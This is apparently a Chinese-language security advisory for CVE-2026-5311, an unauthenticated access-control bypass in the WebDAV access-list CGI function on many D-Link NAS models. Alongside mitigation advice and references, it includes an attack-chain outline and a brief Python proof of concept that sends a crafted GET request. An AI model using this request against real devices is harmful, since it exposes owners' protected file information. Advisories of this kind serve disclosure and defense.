CVE-2026-5311 D-Link NAS设备访问控制漏洞

漏洞信息

漏洞编号

CVE-2026-5311

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

D-Link多款网络附加存储（NAS）设备在2026年2月5日之前的固件版本中存在安全漏洞。该漏洞位于`/cgi-bin/file_center.cgi`文件的`Webdav_Access_List`函数中，由于对`cmd`参数的处理存在访问控制缺陷，未经身份验证的远程攻击者可以通过发送特制的HTTP请求来操纵该参数，从而绕过系统的访问控制机制。成功利用此漏洞可能导致敏感信息泄露，攻击者无需用户交互即可远程发起攻击，目前相关利用代码已公开披露，对受影响设备构成实质性威胁。

技术细节

该漏洞源于D-Link NAS设备中CGI接口`/cgi-bin/file_center.cgi`的`Webdav_Access_List`函数未对用户输入的`cmd`参数进行严格的权限验证。在正常业务逻辑中，访问WebDAV列表应当需要相应的权限凭证，但由于代码逻辑缺陷，当攻击者构造包含特定`cmd`参数的请求时，应用程序跳过了身份验证环节或错误地赋予了访问权限。根据CVSS向量，该漏洞具有网络攻击面（AV:N），且不需要前置权限（PR:N）和用户交互（UI:N）。攻击者可通过向目标设备发送恶意HTTP请求，利用该逻辑漏洞直接获取受保护文件列表或敏感信息。由于漏洞利用门槛较低，且已有公开的PoC代码，攻击者可轻易扫描并攻击暴露在互联网上的未修复设备，导致数据机密性受损（C:L）。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别暴露在互联网上的D-Link NAS设备，并检测其固件版本是否在2026年2月5日之前。

STEP 2

2. 漏洞利用

攻击者向目标设备的`/cgi-bin/file_center.cgi`接口发送恶意构造的HTTP GET请求，在`cmd`参数中注入特定载荷以触发`Webdav_Access_List`函数的访问控制缺陷。

STEP 3

3. 权限绕过与数据获取

由于无需认证（PR:N），设备错误地响应了请求，返回了本应受保护的WebDAV访问列表或敏感文件信息，导致机密性泄露（C:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL, replace <TARGET_IP> with the actual device IP
target_url = "http://<TARGET_IP>/cgi-bin/file_center.cgi"

# The vulnerability is triggered by manipulating the 'cmd' argument
# in the Webdav_Access_List function without authentication.
payload = {
    "cmd": "Webdav_Access_List", 
    # Additional parameters might be required to trigger specific behavior
}

try:
    # Send request without authentication headers (PR:N)
    response = requests.get(target_url, params=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print("Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04 (固件版本 < 20260205)

防御指南

临时缓解措施

如果无法立即升级固件，建议将设备部署在内网环境中，禁止设备管理端口（如80/8080/443）直接暴露在公网，并利用防火墙阻断外部对CGI接口的访问，以降低被远程攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5311
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5311
3 Details https://www.cvedetails.com/cve/CVE-2026-5311/
4 VulDB https://vuldb.com/cve/CVE-2026-5311
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_171/171.md
6 Link https://vuldb.com/submit/780441
7 Link https://vuldb.com/vuln/354640
8 Link https://vuldb.com/vuln/354640/cti
9 Link https://www.dlink.com/